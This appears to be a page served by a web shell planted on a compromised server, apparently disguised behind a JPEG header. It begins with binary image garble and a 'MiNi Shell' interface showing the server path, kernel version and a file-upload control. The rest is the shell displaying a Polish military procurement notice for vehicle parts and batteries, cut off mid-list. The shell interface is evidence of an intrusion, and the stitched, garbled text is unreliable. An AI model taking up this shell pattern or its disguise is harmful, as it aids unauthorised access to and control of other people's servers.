JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221021/0040430001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA CZĘŚCI I AKCESORIÓW DO POJAZDÓW W 2023 ROKU. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA CZĘŚCI I AKCESORIÓW DO POJAZDÓW W 2023 ROKU. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-080e0e2b-5122-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00404300</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych)<br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/> Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na :<br/>„Dostawa części i akcesoriów do pojazdów w 2023 roku” nr postępowania 42/SZP/2022;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/> Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest<br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">jw</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.43.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia	Jm	Ilość minimalna	Ilość maksymalma<br/>1	Akumulator 12V70Ah 600-760A, kwasowy lub AGM, rozruchowy, bezobsługowy, szczelnie zamknięty bez możliwości wycieku kwasu oraz wydzielania gazów, odporność na wysokie i niskie temperatury, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych. szt.	1	1<br/>2	Akumulator 12V75Ah 650-760A, kwasowy lub AGM, rozruchowy, bezobsługowy, szczelnie zamknięty bez możliwości wycieku kwasu oraz wydzielania gazów, odporność na wysokie i niskie temperatury, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych. Przeznaczony do pojazdów z systemem START-STOP o zwiekszonej ilości cykli rozruchowych.	szt.	4	4<br/>3	Akumulator 12V74Ah 600-750A, kwasowy, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochoowych.	szt.	2	2<br/>4	Akumulator 12V62Ah 540-600A, kwasowy, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych.	szt.	1	1<br/>5	Akumulator 12V10Ah, wykonany w technologi AGM lub GEL, stosowany do układaów zasilania awaryjnego, oświetlenia zapasowego, całkowicie bezobsługowy, odporny na wibracje i pracę w dowolnej pozycji.	szt.	1	1<br/>6	Akumulator 12V8Ah, wykonany w technologi AGM lub GEL, stosowany do układaów zasilania awaryjnego, oświetlenia zapasowego, całkowicie bezobsługowy, odporny na wibracje i pracę w dowolnej pozycji.	szt.	2	2<br/>7	Akumulator 12V68Ah 600-750A, kwasowy lub AGM, rozruchowy, bezobsługowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych. Przeznaczony do pojazdów z systemem START-STOP, posiada zwiekszona ilość cykli rozruchowych. szt.	11	11<br/>8	Akumulator 12V95Ah 700-900A, kwasowy lub AGM, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych.	szt.	4	4<br/>9	Akumulator 12V60Ah 540-620A, kwasowy lub AGM, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochoowych. Przeznaczony do pojazdów posiadających system START-STOP oraz zwiększoną ilość cykli rozruchowych.	szt.	1	1<br/>10	Akumulator 12V85Ah 600-750A, kwasowy, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochoowych.	szt.	1	1<br/>11	AKUMULATOR OŁOWIOWO-ROZRUCHOWY 12V100AH rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych.	szt.	16	16<br/>12	AKUMULATOR OŁOWIOWO-ROZRUCHOWY 12V110AH rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych.	szt.	4	4<br/>13	Akumulator 12V14Ah , kwasowy lub AGM, rozruchowy, przeznaczony do zasilania układów rozruchowych i elektrycznych w pojazdach mechanicznych oraz samochodowych.	szt.	2	2<br/>14	&#34;Akumulator żelowy 12V/120Ah<br/>Napięcie: 12V <br/>Pojemność: 120.0Ah<br/>Prąd rozruchowy: 800A<br/>Rodzaj styków: słupki pod klemy, prawy +<br/>Wymiary: <br/>-długość 340mm +/- 5mm<br/>-szerokość 170mm +/- 5mm<br/>-wysokość 225mm +/- 5mm&#34;	szt.	3	4<br/>15	&#34;Akumulator rozruchowo żelowy 12V/38Ah<br/>Napięcie: 12V<br/>Pojemność nominalna: 38Ah<br/>Waga 12,7kg<br/>Wymiary: <br/>-długość 206mm <br/>-szerokość 97mm<br/>-wysokość 250mm<br/>(wymiary +/- 2mm)&#34;	szt.	1	2<br/>16	&#34;Akumulator pokładowo żelowy 12V/55Ah<br/>Napięcie: 12V<br/>Pojemność znamionowa: 55Ah<br/>Waga 19kg<br/>Wymiary:<br/>-długość 261mm<br/>-szerokość 135mm<br/>-wysokość 208mm<br/>(wymiary +/- 2mm)&#34;	szt.	1	2<br/>17	&#34;Akumulator pokładowo żelowy 12V/120Ah<br/>Wymiary:<br/>-długość 380mm (400 z uchwytem)<br/>-szerokość 220mm<br/>-wysokość 220mm (ze słupkiem, słupki nalewane)<br/>(wymiary +/- 2mm)&#34;	szt.	1	2<br/>18	&#34;Akumulator żelowy 12V/33Ah<br/>Napięcie: 12V<br/>Pojemność: 33Ah<br/>Waga 11,25kg<br/>Wymiary:<br/>-długość 196mm<br/>-szerokość 129mm<br/>-wysokość 168mm<br/>(wymiary +/- 2mm)&#34;	szt.	3	4<br/>19	&#34;Akumulator żelowy 12V/140Ah<br/>Napięcie: 12V<br/>Pojemność: 140Ah<br/>Waga 43kg<br/>Wymiary: <br/>-długość 345mm<br/>-szerokość 170mm<br/>-wysokość 285mm<br/>(wymiary +/- 2mm)&#34;	szt.	3	4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31430000-9 - Akumulatory elektryczne</p> <p class="mb-0">31400000-0 - Akumulatory, komory galwaniczne i baterie galwaniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w opisie przedmiotu zamówienia z zastrzeżeniem, że jeżeli dla danej pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość, oznacza to, że dla tej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych - 60%<br/>2) Termin realizacji dostawy dla ilości minimalnych - 40%<br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/><br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Termin realizacji dostawy dla ilości minimalnych”.<br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/><br/> najniższa oferowana cena brutto oferty <br/> dla ilości minimalnych<br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty dla ilości minimalnych <br/> badanej oferty<br/><br/>W kryterium „Przyjęty do realizacji wariant dostaw” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy będzie wynosił od 3 do 5 dni roboczych <br/>WARIANT II - 30 pkt, gdy termin dostawy będzie wynosił od 6 do 8 dni roboczych<br/>WARIANT III - 20 pkt, gdy termin dostawy będzie wynosił od 9 do 11 dni roboczych<br/>WARIANT IV - 0 pkt, gdy termin dostawy będzie wynosił 12-14 dni roboczych.<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant dostaw i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 4 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>	Minimalny termin realizacji dostawy dla ilości minimalnych nie może być krótszy niż 3 dni robocze od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Maksymalny termin realizacji dostawy dla ilości minimalnych nie może przekroczyć 14 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	W przypadku braku zaznaczenia przez Wykonawcę w formularzu ofertowym żadnego przyjętego do realizacji wariantu dostaw, Zamawiający uzna, że Wykonawca zadeklarował WARIANT IV, w związku z tym otrzyma 0 pkt. <br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp. Przedmiot zamówienia	Jm	Ilość minimalna	Ilość maksymalma<br/>1	DRĄŻEK KIEROWNICZY 444-29-268	szt.	8	8<br/>2	DRĄŻEK KIEROWNICZY 444-29-252	szt.	8	8<br/>3	DRĄŻEK KIEROWNICZY 444-29-269	szt.	8	8<br/>4	DRĄŻEK KIEROWNICZY 441.29.231	szt.	8	8<br/>5	DRĄŻEK KIEROWNICZY 441.29.208	szt.	8	8<br/>6	KOŃCÓWKA DRĄŻKA POPRZECZNEGO 444.29.113	szt.	8	8<br/>7	KOŃCÓWKA DRĄŻKA KIEROWN. 444.29.112	szt.	8	8<br/>8	ZAWÓR STERUJĄCY PRZYCZEPY 45 10 015 0	szt.	24	24<br/>9	OSADNIK PALIWA 0000.0541	szt.	10	10<br/>10	ZBIORNIK LEWY (INST.12V) 444.55.240	szt.	4	4<br/>11	ZBIORNIK LEWY INST.24V 444-55-516	szt.	4	4<br/>12	ZBIORNIK PRAWY (INST. 12V) 444.55.241	szt.	4	4<br/>13	ZBIORNIK PRAWY INST.24V 444-55-517	szt.	4	4<br/>14	POMPA WTRYSK. USZCZELN. S-359 P76-15U/M	szt.	6	6<br/>15	CHŁODNICA WODY Z PODGRZEW. ROZ.0601-1858 szt.	2	2<br/>16	ŁOŻYSKO ŚLIZGOWE 101-209-002	szt.	8	8<br/>17	SPRZEGŁO KPL. STAR 266/ 411.18.205	szt.	4	4<br/>18	USZCZELKA POD GŁOWICĘ S-359M 359-12-112	szt.	12	12<br/>19	WAŁ NAPĘDOWY MOST PRZEDNI –SKRZ. ROZD 27.701.0.000	szt.	2	2<br/>20	WAŁ NAPĘD. SKRZ.ROZD.ŚRODKOWY MOST 27.702.0.000	szt.	2	2<br/>21	WAŁ NAPĘD.SKRZ.ROZD.ŁOŻYSKO POŚRED. 27.703.0.000	szt.	1	1<br/>22	WAŁ NAPĘD.ŁOŻYSKO POŚRED. TYLNY MOST 27.704.0.000	szt.	1	1<br/>23	ZBIORNIK POW.TRÓKOMOROWY 444-62-210	szt.	1	1<br/>24	DWUOBWODOWY MECHANIZM HM12.0	szt.	3	3<br/>25	OSŁONA 444.76.281	szt.	12	12<br/>26	ODMRAŻACZ B-H-039-000-81R	szt.	8	8<br/>27	PRZEŁĄCZNIK AKUM. 12/24V 0000-4796	szt.	10	10<br/>28	ZAWÓR ELEKTROMAGNETYCZNY (24V) EPZ-24	szt.	4	4<br/>29	CZUJNIK POZIOMU PALIWA FCPP-4 24V	szt.	8	8<br/>30	ZAWÓR ODWADNIAJĄCY 82-02-010-0	szt.	6	6<br/>31	LINKA 444-76-274 STAR 266	szt.	6	6<br/>32	PRZEKŁADNIA KIER.TYP ZIŁ 4444-34-208	szt.	1	1<br/>33	PRZEKŁADNIA KIER.TYP ZIŁ 4444-34-236	szt.	2	2<br/>34	PRZEKŁADNIA KIER.(TYP ZF) 75-801-2-000	szt.	2	2<br/>35	CZUJNIK POZIOMU PALIWA CP2BW 12V	szt.	8	8<br/>36	PRZEWÓD: POMPA KIEROWNICA 441.39.203	szt.	6	6<br/>37	PRZEWÓD: POMPA KIEROWNICA 444.39.237	szt.	6	6<br/>38	WYŁĄCZNIK SWIATŁA COFANIA 561-16-20	szt.	6	6<br/>39	PIÓRO WYCIERAKA 561-000-031	szt.	126	126<br/>40	RESOR PRZEDNI 444.14.271	szt.	2	2<br/>41	RESOR PRZEDNI 444.14.293	szt.	2	2<br/>42	LAMPA ŚWIATŁA COFANIA 062-011-3311	szt.	2	2<br/>43	DRĄŻEK REAKCYJNY 408.14.246	szt.	4	4<br/>44	PIASTA RESORÓW 444.14.267	szt.	2	2<br/>45	KOŁO KIEROWNICZE 444.34.215	szt.	2	2<br/>46	POMPA SPRZEGŁA PHS-2-19	szt.	2	2<br/>47	BĘBEN HAMULCOWY 467-45-023	szt.	23	23<br/>48	PRZEŁACZNIK ZESPOLONY 24V 529-12-00	szt.	4	4<br/>49	ROZRUSZNIK R-10CW KPL. 853.000.0	szt.	2	2<br/>50	PRZYCISK SYGNALIZACJI P4014	szt.	3	3<br/>51	PIERŚCIEŃ ZGARNIAJĄCY 444-29-090	szt.	4	4<br/>52	SPRĘZYNA SZCZEK 444.44.147	szt.	20	20<br/>53	PRZEWÓD HAMULCOWY ELASTYCZNY 444.35.027	szt.	10	10<br/>54	PRZEGÓB KULOWY PRAWY 444-29-271	szt.	20	20<br/>55	KRZYZAK Z ŁOZYSKAMI 27.431.3.030	szt.	10	10<br/>56	